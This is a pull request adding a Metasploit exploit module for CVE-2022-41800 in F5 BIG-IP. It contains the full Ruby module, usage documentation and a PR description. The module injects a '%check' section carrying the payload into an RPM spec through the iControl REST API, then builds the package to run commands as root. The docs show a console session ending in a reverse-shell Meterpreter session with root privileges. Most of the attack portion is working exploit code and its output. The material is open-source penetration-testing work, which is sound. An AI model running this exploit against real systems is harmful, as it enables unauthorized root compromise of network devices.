### PR TITLE
F5 exploit module CVE-2022-41800 (authenticated RCE in RPM code)

### DIFF
--- a/documentation/modules/exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800.md
+++ b/documentation/modules/exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800.md
@@ -1,0 +1,61 @@
+## Vulnerable Application
+
+The vulnerable application is F5 Big-IP version 17.0.0.1 and below. It can be
+downloaded as a VMWare image for free (you have to create an account) from
+https://downloads.f5.com. You can register for a free 30-day trial if you like,
+but it's not required to test this.
+
+Boot the VM and set an admin password by logging in with the default credentials
+(admin / admin). You'll need that password.
+
+## Verification Steps
+
+1. Install the application
+2. Start `msfconsole`
+3. Do: `use exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800`
+4. Do `set RHOST <target>` / `set HttpUsername admin` / `set HttpPassword <thepasswordyouchose>`
+5. Do: `run`
+6. You should get a session
+
+## Options
+
+### `HttpUsername` / `HttpPassword`
+
+The account to authorize as - requires console access. The `admin` account (which
+is the default `HttpUsername`) works great, if you have the password.
+
+## Scenarios
+
+### F5 Big-IP 17.0.0.1
+
+This should be the normal experience:
+
+```
+msf6 > use exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set RHOST 10.0.0.162
+RHOST => 10.0.0.162
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set LHOST 10.0.0.179
+LHOST => 10.0.0.179
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set HttpPassword iagotestbigip
+HttpPassword => mybigippassword
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set VERBOSE true
+VERBOSE => true
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > exploit
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[*] Creating an .rpmspec file on the target...
+[*] Created spec file: /var/config/rest/node/tmp/2fadbb5d-ed94-4b23-ba57-2f0d273d2bdc.spec
+[*] Building the RPM to trigger the payload...
+[*] Sending stage (40168 bytes) to 10.0.0.162
+[+] Deleted /var/config/rest/node/tmp/2fadbb5d-ed94-4b23-ba57-2f0d273d2bdc.spec
+[+] Deleted /var/config/rest/node/tmp/RPMS/noarch/wOXt3-4.1.3-0.8.6.noarch.rpm
+[*] Meterpreter session 2 opened (10.0.0.179:4444 -> 10.0.0.162:38556) at 2022-11-14 15:14:23 -0800
+
+meterpreter > getuid
+Server username: root
+```

--- a/modules/exploits/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800.rb
+++ b/modules/exploits/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800.rb
@@ -1,0 +1,125 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'F5 BIG-IP iControl Authenticated RCE via RPM Creator',
+        'Description' => %q{
+          This module exploits a newline injection into an RPM .rpmspec file
+          that permits authenticated users to remotely execute commands.
+
+          Successful exploitation results in remote code execution
+          as the root user.
+        },
+        'Author' => [
+          'Ron Bowes' # Discovery, PoC, and module
+        ],
+        'References' => [
+          ['CVE', '2022-41800'],
+          # TODO: Links to our blog + F5's disclosure
+        ],
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2022-11-16', # Vendor advisory
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [ 'Default', {} ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true,
+          'PrependFork' => true, # Needed to avoid warnings about timeouts and potential failures across attempts.
+          'MeterpreterTryToFork' => true # Needed to avoid warnings about timeouts and potential failures across attempts.
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION], # One at a time
+          'SideEffects' => [
+            IOC_IN_LOGS,
+            ARTIFACTS_ON_DISK
+          ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('HttpUsername', [true, 'iControl username', 'admin']),
+        OptString.new('HttpPassword', [true, 'iControl password', ''])
+      ]
+    )
+  end
+
+  def exploit
+    # The RPM name is based on these, so we need these to delete the RPM file after
+    name = rand_text_alphanumeric(5..10)
+    version = "#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}"
+    release = "#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}"
+
+    vprint_status('Creating an .rpmspec file on the target...')
+    result = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/rpm-spec-creator'),
+      'ctype' => 'application/json',
+      'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),
+      'data' => {
+        'specFileData' => {
+          'name' => name,
+          'srcBasePath' => '/tmp',
+          'version' => version,
+          'release' => release,
+          # This is the injection - add newlines then a '%check' section
+          'description' => "\n\n%check\n#{payload.encoded}\n",
+          'summary' => rand_text_alphanumeric(5..10)
+        }
+      }.to_json
+    })
+
+    fail_with(Failure::Unknown, 'Failed to send HTTP request') unless result
+    fail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401
+    fail_with(Failure::UnexpectedReply, "Server returned an unexpected response: HTTP/#{result.code}") if result.code != 200
+
+    json = result&.get_json_document
+    fail_with(Failure::UnexpectedReply, "Server didn't return valid JSON") unless json
+
+    file_path = json['specFilePath']
+    fail_with(Failure::UnexpectedReply, "Server didn't return a specFilePath") unless file_path
+    vprint_status("Created spec file: #{file_path}")
+    register_file_for_cleanup(file_path)
+
+    # We can also use `exit 1` in the %check function to prevent this file
+    # from being created, rather than cleaning it up.. but that seems noisier?
+    # Neither option gets logged so /shrug
+    register_file_for_cleanup("/var/config/rest/node/tmp/RPMS/noarch/#{name}-#{version}-#{release}.noarch.rpm")
+
+    vprint_status('Building the RPM to trigger the payload...')
+    result = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/build-package'),
+      'ctype' => 'application/json',
+      'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),
+      'data' => {
+        'state' => {},
+        'appName' => rand_text_alphanumeric(5..10),
+        'packageDirectory' => '/tmp',
+        'specFilePath' => file_path
+      }.to_json
+    })
+    fail_with(Failure::Unknown, 'Failed to send HTTP request') unless result
+    fail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401
+    fail_with(Failure::UnexpectedReply, "Server returned an unexpected response: HTTP/#{result.code}") if result.code < 200 || result.code > 299
+  end
+end

--- a/modules/exploits/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800.rb
+++ b/modules/exploits/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800.rb
@@ -27,7 +27,9 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References' => [
           ['CVE', '2022-41800'],
-          # TODO: Links to our blog + F5's disclosure
+          ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],
+          ['URL', 'https://support.f5.com/csp/article/K97843387'],
+          ['URL', 'https://support.f5.com/csp/article/K13325942'],
         ],
         'License' => MSF_LICENSE,
         'DisclosureDate' => '2022-11-16', # Vendor advisory

--- a/modules/exploits/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800.rb
+++ b/modules/exploits/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800.rb
@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStager
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
@@ -34,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'DisclosureDate' => '2022-11-16', # Vendor advisory
         'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Arch' => [ARCH_CMD],
         'Privileged' => true,
         'Targets' => [
           [ 'Default', {} ]


### PR DESCRIPTION
Check in a module for CVE-2022-41800, which is an authenticated RCE in F5 BigIP. It requires a username/password, and grants a root shell.

This is particularly useful for testing post modules. :)

Everything is tested against F5 Big-IP 17.0.0.1, which is freely available as a VM image (with a free account). It's also in our "vulnerable software" directory.

## Verification

1. Install the application
2. Start `msfconsole`
3. Do: `use exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800`
4. Do `set RHOST <target>` / `set HttpUsername admin` / `set HttpPassword <thepasswordyouchose>`
5. Do: `run`
6. You should get a session